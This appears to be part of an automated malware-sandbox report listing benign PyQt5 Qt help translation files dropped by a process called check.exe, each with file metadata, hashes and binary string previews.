                                                                                                                                                                                                                                      Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7444
                                                                                                                                                                                                                                      Entropy (8bit):4.580794980254807
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                                                      MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                                                      SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                                                      SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                                                      SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):15297
                                                                                                                                                                                                                                      Entropy (8bit):4.708378368926237
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                                                      MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                                                      SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                                                      SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                                                      SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_da.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4795
                                                                                                                                                                                                                                      Entropy (8bit):4.530246422531362
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                                                      MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                                                      SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                                                      SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                                                      SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_de.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7570
                                                                                                                                                                                                                                      Entropy (8bit):4.550982634910665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                                                      MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                                                      SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                                                      SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                                                      SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_en.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                      Entropy (8bit):4.0
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                                                      MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                                                      SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                                                      SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                                                      SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`...

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_es.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10704
                                                                                                                                                                                                                                      Entropy (8bit):4.481291573289571
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                                                      MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                                                      SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                                                      SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                                                      SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_fr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10922
                                                                                                                                                                                                                                      Entropy (8bit):4.459946393010639
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                                                      MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                                                      SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                                                      SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                                                      SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_gl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10891
                                                                                                                                                                                                                                      Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                                                      MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                                                      SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                                                      SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                                                      SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10284
                                                                                                                                                                                                                                      Entropy (8bit):4.674501432335502
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                                                      MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                                                      SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                                                      SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                                                      SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10612
                                                                                                                                                                                                                                      Entropy (8bit):4.458970627057882
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                                                      MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                                                      SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                                                      SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                                                      SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7917
                                                                                                                                                                                                                                      Entropy (8bit):5.680408580146589
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                                                      MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                                                      SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                                                      SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                                                      SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5708
                                                                                                                                                                                                                                      Entropy (8bit):5.698914195742074
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                                                      MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                                                      SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                                                      SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                                                      SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\translations\qt_help_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9673
                                                                                                                                                                                                                                      Entropy (8bit):4.622652249027856
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                                                      MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                                                      SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                                                      SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                                                      SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
